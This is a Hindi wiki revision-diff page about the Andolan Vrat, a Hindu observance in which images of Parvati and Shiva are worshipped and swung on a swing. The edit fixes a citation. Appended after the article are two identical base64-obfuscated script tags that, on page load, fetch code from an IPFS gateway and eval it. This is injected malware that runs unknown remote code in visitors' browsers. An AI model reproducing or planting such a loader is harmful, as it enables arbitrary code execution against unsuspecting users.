Difference between revisions of "आन्दोलन व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*आन्दोलन व्रत [[चैत्र]] [[शुक्ल पक्ष]] की [[तृतीया]] को किया जाता है।
 
*आन्दोलन व्रत [[चैत्र]] [[शुक्ल पक्ष]] की [[तृतीया]] को किया जाता है।
*आन्दोलन व्रत में [[पार्वती]] एवं [[शिव]] की प्रतिमाओं की पूजा एवं उन्हें दोला (झूला) पर झुलाया जाता है। <ref>हेमाद्रि व्रतखण्ड (2, 745-748); स्मृतिकौस्तुभ  (90-91); पुरुषार्थचिन्तामणि (85)</ref>
+
*आन्दोलन व्रत में [[पार्वती]] एवं [[शिव]] की प्रतिमाओं की पूजा एवं उन्हें दोला (झूला) पर झुलाया जाता है। <ref>हेमाद्रि व्रतखण्ड (2, 745-748); स्मृतिकौस्तुभ  (90-91); पुरुषार्थचिन्तामणि (85</ref>
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 12:40, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • andolan vrat chaitr shukl paksh ki tritiya ko kiya jata hai.
  • andolan vrat mean parvati evan shiv ki pratimaoan ki pooja evan unhean dola (jhoola) par jhulaya jata hai. [1]


tika tippani aur sandarbh

  1. hemadri vratakhand (2, 745-748); smritikaustubh (90-91); purusharthachintamani (85

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>